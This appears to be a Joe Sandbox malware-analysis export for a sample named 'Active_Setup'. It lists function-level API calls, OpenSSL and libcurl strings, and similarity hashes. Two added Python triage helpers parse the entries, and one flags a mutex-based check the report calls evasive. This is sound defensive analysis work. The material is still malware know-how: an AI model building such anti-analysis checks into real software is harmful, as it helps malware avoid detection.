  • Part of subcall function 01088E71: RaiseException.KERNEL32(?,?,0107FD3A,?,?,?,?,?,0107FD3A,?,010E5BF8,010F4164), ref: 01088EB3
  • Part of subcall function 00FB12B0: std::exception::exception.LIBCMT ref: 00FB12DE
Strings
• invalid string position, xrefs: 0109A1BB
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: invalid string position
• API String ID: 3355147766-1799206989
• Opcode ID: 14b1513f91bd0a37ee671cd2dc2526242cd44004d551650f3d9424cba608cada
• Instruction ID: db623b98422f2f9db03d395948e2f4f91a8eae8952cb5aa9a1a5311f91af15ea
• Opcode Fuzzy Hash: 14b1513f91bd0a37ee671cd2dc2526242cd44004d551650f3d9424cba608cada
• Instruction Fuzzy Hash: ECF0307264021CABCB14FBD1CC15ADEB778EB28361F50041AA284A7140DAB5D900D7A4
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3938a12000808ecf5b104c08953b4a48a278607cb04fa5e226d06ea31ccff829
• Instruction ID: ef98108d59448705999cc783328c705aa370231c6ef342650eade4aaae8e984b
• Opcode Fuzzy Hash: 3938a12000808ecf5b104c08953b4a48a278607cb04fa5e226d06ea31ccff829
• Instruction Fuzzy Hash: 66D17EB5604315AFE714DF68CC84EBBB7EDEBC9704F044A1CF98587249E674E8058BA2
APIs
• __EH_prolog3_GS.LIBCMT ref: 0109AD5B
• _fgetc.LIBCMT ref: 0109AE91
  • Part of subcall function 0109ACC1: std::_String_base::_Xlen.LIBCPMT ref: 0109ACD7
• _memcpy_s.LIBCMT ref: 0109AE56
• _ungetc.LIBCMT ref: 0109AEDC
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
• String ID:
• API String ID: 9762108-0
• Opcode ID: 049384f32831b95dd768e30ed5ef3d0c0f77c96fd70c23ab0d933a67547744f0
• Instruction ID: bea3b2199532b8be479512145c516274e4eacffc15a2ebe352648d6be5a3d36d
• Opcode Fuzzy Hash: 049384f32831b95dd768e30ed5ef3d0c0f77c96fd70c23ab0d933a67547744f0
• Instruction Fuzzy Hash: BF515572A00609DFCF15EBB9C8649EEB7F9EF59310B10491AE592E7190EB34E904DB50
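Every function entry in this part of the report has the same text layout: an APIs list (with indented "Part of subcall function" lines for calls made one level down), an optional Strings list with xrefs, the Memory Dump Source block, and the Similarity fields ending in the Instruction Fuzzy Hash. That regularity makes the export easy to turn into data when a report has hundreds of such entries. The parser below is an added example, not Joe Sandbox tooling and not code from the sample; the SAMPLE text is copied from the two entries above with the repeated memory-dump lines trimmed. The two triage tags it produces are the editor's heuristics, not fields of the report: a GetProcAddress call whose second argument is a readable name marks run-time API resolution worth a look, and an entry whose direct calls all come from LIBCMT/LIBCPMT is usually compiler runtime rather than the author's logic and can be deprioritised.

```python
"""Parse Joe Sandbox function entries (APIs / Strings / Similarity records) into
dicts and tag them for triage.  Added example for this page, not Joe Sandbox
tooling.  SAMPLE is copied from the report entries above (memory-dump lines
trimmed); the tags in triage() are the editor's heuristics, not report fields."""
import re

SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,010825D4), ref: 0108F123
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0108F133
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
• Opcode ID: 0e72ff6037053c4965a438d79254ee2e42230d185d32d1429691df05c2e1c497
• Instruction Fuzzy Hash: E2F01D30A04B0AD6DF102BB5A80E6AE7EB9BB81746F824494A6D1E00C8DE3580B58355
APIs
• __EH_prolog3.LIBCMT ref: 0109A1B6
• std::bad_exception::bad_exception.LIBCMT ref: 0109A1D3
• __CxxThrowException@8.LIBCMT ref: 0109A1E1
  • Part of subcall function 01088E71: RaiseException.KERNEL32(?,?,0107FD3A,?,?,?,?,?,0107FD3A,?,010E5BF8,010F4164), ref: 01088EB3
Strings
• invalid string position, xrefs: 0109A1BB
Similarity
• API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: invalid string position
• Instruction Fuzzy Hash: ECF0307264021CABCB14FBD1CC15ADEB778EB28361F50041AA284A7140DAB5D900D7A4
"""

# "Name.LIB(args), ref: ADDR" or "Name.LIB ref: ADDR" (CRT entries have no comma)
API_RE = re.compile(r"^(?P<name>.+?)\.(?P<lib>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+): (?P<rest>.+)$")
XREF_RE = re.compile(r"^(?P<s>.+), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
CRT_LIBS = {"LIBCMT", "LIBCPMT"}


def _new_entry():
    return {"apis": [], "strings": [], "fields": {}}


def _add_api(text, entry, subcall_of=None):
    m = API_RE.match(text)
    if not m:
        return
    rec = m.groupdict()
    rec["args"] = rec["args"].split(",") if rec["args"] else []
    rec["subcall_of"] = subcall_of      # address of the callee the API is reached through
    entry["apis"].append(rec)


def parse_entries(text):
    """Split the export into one dict per function; an entry ends at its
    'Instruction Fuzzy Hash' line, which is the last field Joe Sandbox prints."""
    entries, cur, section = [], _new_entry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line                     # APIs / Strings / Similarity / ...
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(item)
            if sub:
                _add_api(sub["rest"], cur, subcall_of=sub["fn"])
            else:
                _add_api(item, cur)
        elif section == "Strings":
            x = XREF_RE.match(item)
            if x:
                cur["strings"].append({"value": x["s"], "xref": x["ref"]})
        else:
            f = FIELD_RE.match(item)
            if f:
                if f["key"] == "Associated":
                    cur["fields"].setdefault("Associated", []).append(f["val"])
                else:
                    cur["fields"][f["key"]] = f["val"]
                if f["key"] == "Instruction Fuzzy Hash":
                    entries.append(cur)
                    cur = _new_entry()
    return entries


def api_chain(entry):
    """Direct calls in order, handy for grouping entries that share a pattern."""
    return "->".join(a["name"] for a in entry["apis"] if a["subcall_of"] is None)


def triage(entry):
    """Heuristic tags (editor's assumptions): run-time API resolution by name,
    CRT-only entries, and exception-raising paths."""
    tags = []
    apis = entry["apis"]
    for a in apis:
        if a["name"] == "GetProcAddress" and len(a["args"]) > 1 \
                and not re.fullmatch(r"[0-9A-Fa-f?]+", a["args"][1]):
            tags.append("resolves:" + a["args"][1])
    direct = [a for a in apis if a["subcall_of"] is None]
    if direct and all(a["lib"] in CRT_LIBS for a in direct):
        tags.append("crt-only")
    if any(a["name"] == "RaiseException" or a["name"].startswith("__CxxThrow") for a in apis):
        tags.append("exception-path")
    return tags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(api_chain(e), triage(e), e["fields"].get("API String ID"))
```

Grouping by api_chain or by the report's own API String ID is the quickest way to find the one or two entries that actually matter in a dump like this one: the hundreds of LIBCMT/LIBCPMT entries collapse into a few chains, and what remains is the code that touches KERNEL32 and friends directly.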
APIs
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE27
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE38
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE49
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE5A
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE6B
  • Part of subcall function 0104CE20: _signal.LIBCMT ref: 0104CE7C
• _fgets.LIBCMT ref: 0104CF01
• _feof.LIBCMT ref: 0104CF14
• _ferror.LIBCMT ref: 0104CF26
• _fprintf.LIBCMT ref: 0104CFA7
  • Part of subcall function 0104CDD0: GetStdHandle.KERNEL32(000000F6), ref: 0104CE01
  • Part of subcall function 0104CDD0: FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0104CE08
  • Part of subcall function 0104CC40: _fgets.LIBCMT ref: 0104CC5D
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _signal$_fgets$BufferConsoleFlushHandleInput_feof_ferror_fprintf
• String ID:
• API String ID: 600490286-0
• Opcode ID: e5cfb2ce93c171c0b19ccb72d4c72cf8bec0921ed2e8ac7e6019868c5dd8aac3
• Instruction ID: e81c5dfbc3f8456812e0a2b21af00a3675f0b13dd9704c94748f53d849b402ed
• Opcode Fuzzy Hash: e5cfb2ce93c171c0b19ccb72d4c72cf8bec0921ed2e8ac7e6019868c5dd8aac3
                                                                                                                                                  • Instruction Fuzzy Hash: 5031D6F150A3429FE330EB94E9C16ABB7E4EBA0344F04453DFAD486151E63A9404CB52
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00FEDD50: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000), ref: 00FEDD94
                                                                                                                                                    • Part of subcall function 00FEDD50: GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00FEDDA0
                                                                                                                                                    • Part of subcall function 00FEDD50: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00FEDDC1
                                                                                                                                                    • Part of subcall function 00FEDD50: GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00FEDDCD
                                                                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000AF), ref: 00FEE3F8
                                                                                                                                                    • Part of subcall function 01081557: __getptd_noexit.LIBCMT ref: 01081557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$ByteCharMultiWide$__getptd_noexit
                                                                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                  • API String ID: 3781935072-2085858615
                                                                                                                                                  • Opcode ID: 7bf12a8c06ab219e6484053673d00ace2114bab6f9d4014980232a73a33fc9b0
                                                                                                                                                  • Instruction ID: b8c9fad9f40876b9df36923207b844278f070cabde26fb87818d3b16446a2d5b
                                                                                                                                                  • Opcode Fuzzy Hash: 7bf12a8c06ab219e6484053673d00ace2114bab6f9d4014980232a73a33fc9b0
                                                                                                                                                  • Instruction Fuzzy Hash: A711CBB6BC131136E53175AA2C87FDB324A9FD1FA1F084066F744BD1C2E6C64415A1B3
                                                                                                                                                  APIs
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000,7344748B,?,00000000), ref: 00FB1399
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00FB13A4
                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00FB13C5
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00FB13CA
                                                                                                                                                    • Part of subcall function 0107FCD6: _malloc.LIBCMT ref: 0107FCF0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastMutex$_malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3575291929-0
                                                                                                                                                  • Opcode ID: bfc6b4caa882cb04124cbb0d00b95138b6ce9df00d246aecb4a4c4940d3a7724
                                                                                                                                                  • Instruction ID: 6cc06d689c3e2c3e352036a082cf7579160718a93ec3424bf3565309ca805749
                                                                                                                                                  • Opcode Fuzzy Hash: bfc6b4caa882cb04124cbb0d00b95138b6ce9df00d246aecb4a4c4940d3a7724
                                                                                                                                                  • Instruction Fuzzy Hash: 583126B1905B849FD320CF2AC980657FBE8FB58650F844A2EE1DAC3A10D339A504CB65
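The CreateMutexW / GetLastError pairs at 00FB1399..00FB13CA in the entry above are the evasive API chain the report's signature list calls out ("may stop execution after checking mutex"): the error code read right after CreateMutexW tells the caller whether the named mutex already existed. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or its IDA plugin output. It parses bullet lines in the layout the report uses, flags functions that contain that chain, and collects library source paths passed as call arguments (the `.\crypto\bio\bss_file.c` argument two entries up, beside the `fopen('` and `','` strings, is consistent with the error path of OpenSSL's BIO_new_file, i.e. OpenSSL linked statically into the sample). The sample input is the page's own lines; the image base 0x00FB0000 is the Source File offset; ERROR_ALREADY_EXISTS (0xB7) is the documented Win32 code; the function and class names are this example's own.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings.

Parses the bullet lines under each "APIs" header, then flags the
CreateMutexW -> GetLastError evasion chain and collects library source
paths that appear as call arguments (OpenSSL's .\crypto\...\*.c files here).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Sample input: lines taken from the function entries on this page, laid out
# the way the report renders them (one "APIs" list per function).
SAMPLE = r"""
APIs
• CreateMutexW.KERNEL32(00000000,00000000,00000000,7344748B,?,00000000), ref: 00FB1399
• GetLastError.KERNEL32 ref: 00FB13A4
• CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00FB13C5
• GetLastError.KERNEL32 ref: 00FB13CA
  • Part of subcall function 0107FCD6: _malloc.LIBCMT ref: 0107FCF0
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
APIs
  • Part of subcall function 00FEDD50: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000), ref: 00FEDD94
• GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000AF), ref: 00FEE3F8
Strings
"""

# Image base from the report's "Source File" line (Offset: 00FB0000).
IMAGE_BASE = 0x00FB0000
# Win32 error code CreateMutex sets when the named mutex already existed.
ERROR_ALREADY_EXISTS = 0xB7

API_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SRC_PATH_RE = re.compile(r"^\.\\[\w\\]+\.c$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line is "Part of subcall function"


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)


def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per "APIs" header; the list closes at the next
    "Strings" or "Memory Dump Source" header.  An "APIs" header with no
    bullets (the page collapses some lists) yields an empty entry."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if line in ("Strings", "Memory Dump Source"):
            current = None
            continue
        m = API_RE.match(raw)
        if current is not None and m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            current.calls.append(ApiCall(
                name=m["name"], module=m["module"], args=args,
                ref=int(m["ref"], 16),
                subcall=int(m["sub"], 16) if m["sub"] else None,
            ))
    return entries


def rva(address: int, base: int = IMAGE_BASE) -> int:
    """Image-relative offset, so a call site can be located in the PE on disk."""
    return address - base


def has_mutex_check(entry: FunctionEntry) -> bool:
    """CreateMutexA/W immediately followed by GetLastError in the same function.
    Code written this way compares the result against ERROR_ALREADY_EXISTS and
    typically exits when another instance (or an analyst's pre-created mutex)
    already owns the name.  Only direct calls count; subcall lines describe
    other functions."""
    direct = [c for c in entry.calls if c.subcall is None]
    return any(a.name.startswith("CreateMutex") and b.name == "GetLastError"
               for a, b in zip(direct, direct[1:]))


def source_paths(entry: FunctionEntry) -> Set[str]:
    """Library source file paths passed as arguments; OpenSSL's error macros
    push __FILE__ and __LINE__, which is why a .c path sits next to a line
    number such as 000000AF."""
    return {a for c in entry.calls for a in c.args if SRC_PATH_RE.match(a)}


if __name__ == "__main__":
    for i, e in enumerate(parse_entries(SAMPLE)):
        sites = [hex(rva(c.ref)) for c in e.calls if c.subcall is None]
        print(f"entry {i}: mutex_check={has_mutex_check(e)} "
              f"sources={sorted(source_paths(e))} call_sites={sites}")
```

Run it against a saved copy of the report to list every function that performs the mutex check, then use the RVAs to find the comparison against ERROR_ALREADY_EXISTS in a disassembler; pre-creating the mutex name the sample uses is the usual way to confirm that it really exits.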
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction ID: 3423f4261de619e24af25b932c7ed78180bff5a9ab181c7516c62ca006baedc4
                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction Fuzzy Hash: 73113D3200814EFFCF666E98CC018EE3F62BB18354B588455FA9899121C636C5B2AF81
                                                                                                                                                  APIs
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 01080483
                                                                                                                                                    • Part of subcall function 0108AF90: __FindPESection.LIBCMT ref: 0108AFEB
                                                                                                                                                  • __getptd_noexit.LIBCMT ref: 01080493
                                                                                                                                                  • __freeptd.LIBCMT ref: 0108049D
                                                                                                                                                  • ExitThread.KERNEL32 ref: 010804A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3182216644-0
                                                                                                                                                  • Opcode ID: f391cbb3eb798a7f1d88fa7f92c2e12e46296ca14d82be28a86e4cecdd613815
                                                                                                                                                  • Instruction ID: c521716d5bdfd396adc54549907f863e2b1f5462dc3eaac41e7eaf985aae0660
                                                                                                                                                  • Opcode Fuzzy Hash: f391cbb3eb798a7f1d88fa7f92c2e12e46296ca14d82be28a86e4cecdd613815
                                                                                                                                                  • Instruction Fuzzy Hash: 36D0C2F01493039AE7A037BDE91AB5A3E885B40111F14C035FAC8844BCEE64D440C214
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\pkcs12\p12_key.c
                                                                                                                                                  • API String ID: 2102423945-3219245189
                                                                                                                                                  • Opcode ID: 675e88ee67cd520a3c178e96a696613a5af57e082f8fef1c7a1c9d9cbe30cfa4
                                                                                                                                                  • Instruction ID: 1cafe51541c07ebe3d11b28d1232e5f4424853b2d513bd3020eb41dd35ed26e3
                                                                                                                                                  • Opcode Fuzzy Hash: 675e88ee67cd520a3c178e96a696613a5af57e082f8fef1c7a1c9d9cbe30cfa4
                                                                                                                                                  • Instruction Fuzzy Hash: 69C1D4B2A483425BD710DB69CC81A6FB7EDBBD4704F08092DFAC587242EA75D905C7A3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 0-2081607520
APIs
• _strncpy.LIBCMT ref: 00FEA35C
  • Part of subcall function 00FEEC00: _memset.LIBCMT ref: 00FEEC22
Strings
Similarity
• API ID: _memset_strncpy
• String ID: .\crypto\x509\x509_obj.c$NO X509_NAME
• API String ID: 3140232205-14672339
Strings
Similarity
• API ID:
• String ID: .\crypto\ec\ec2_oct.c
• API String ID: 0-4139674486
Strings
Similarity
• API ID:
• String ID: .\crypto\ec\ecp_oct.c
• API String ID: 0-623513382
APIs
Strings
Similarity
• API ID: _strncmp_strncpy
• String ID: .\crypto\x509\by_dir.c
• API String ID: 2634297590-1513729148
APIs
Strings
• .\crypto\hmac\hmac.c, xrefs: 0103EF4E
• j <= (int)sizeof(ctx->key), xrefs: 0103EF47
Similarity
• API ID: _memset
• String ID: .\crypto\hmac\hmac.c$j <= (int)sizeof(ctx->key)
• API String ID: 2102423945-2480544988
Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: SSL connection timeout$select/poll on SSL socket, errno: %d
                                                                                                                                                  • API String ID: 0-2573467168
                                                                                                                                                  • Opcode ID: f0c9958661bb0ef69ef5b3a882111f65e884282b7f3f133e976d4fdbd6337bac
                                                                                                                                                  • Instruction ID: e298ff61f7d19339d56ac195916c5a76793510d035f121112470d6fa7e431c7f
                                                                                                                                                  • Opcode Fuzzy Hash: f0c9958661bb0ef69ef5b3a882111f65e884282b7f3f133e976d4fdbd6337bac
                                                                                                                                                  • Instruction Fuzzy Hash: BB512835A082079BDB20DE18AE4BFFA73D5EBC1334F54042EF84186291D7B5D95CE692
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: _memset
• String ID: .\ssl\d1_both.c
• API String ID: 2102423945-2895748750
• Opcode ID: 5d8eb77238564e66f5671529871cc0907ff198a8dadf9d9360fdd617b5d8e68e
• Instruction ID: 9cabc7e218911fcd12b27b0f3c73f7661c6b1dce633be28ffe8dd5816dbd8357
• Opcode Fuzzy Hash: 5d8eb77238564e66f5671529871cc0907ff198a8dadf9d9360fdd617b5d8e68e
• Instruction Fuzzy Hash: 6351E430A04742AFE310CF19C840BA6BBE4FF95314F0881ADE9895B792D372F854CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: _strncpy
• String ID: .\crypto\x509v3\v3_info.c$value=
• API String ID: 2961919466-1641153843
• Opcode ID: 53aa807e114af4afdd3c16d5647608eb4b55370e03c5db1865b81579b1738ab8
• Instruction ID: b02aa5ac6d66c493eca023ccee5606388edeea4e87675fb1a5b0bda0fc917e0a
• Opcode Fuzzy Hash: 53aa807e114af4afdd3c16d5647608eb4b55370e03c5db1865b81579b1738ab8
• Instruction Fuzzy Hash: 62411EB574430167F250FA64DC42F7776D96B84B40F48492DFA85AB2C3E665E5048273
APIs
• curl_multi_remove_handle.ACTIVE_SETUP(?,?), ref: 00FB84A3
• curl_multi_cleanup.ACTIVE_SETUP(?), ref: 00FB84B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: curl_multi_cleanupcurl_multi_remove_handle
• String ID: tP8g
• API String ID: 3059780880-846472870
• Opcode ID: 4fc7a50c3ef190c45d56166c20f0aaeb349b65b92d014224c9a0861beffdb05f
• Instruction ID: 02f3b1c376f9ddf5a810f48dc735fe0cc3dcda55b1d50001bee20aab215d046d
• Opcode Fuzzy Hash: 4fc7a50c3ef190c45d56166c20f0aaeb349b65b92d014224c9a0861beffdb05f
• Instruction Fuzzy Hash: BC5193F0D00F008BC6719B2A9D49A87B7E9BF80714F188D19F19BC6205EA36F951DF5A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: _memset
• String ID: %02x%s
• API String ID: 2102423945-1723692035
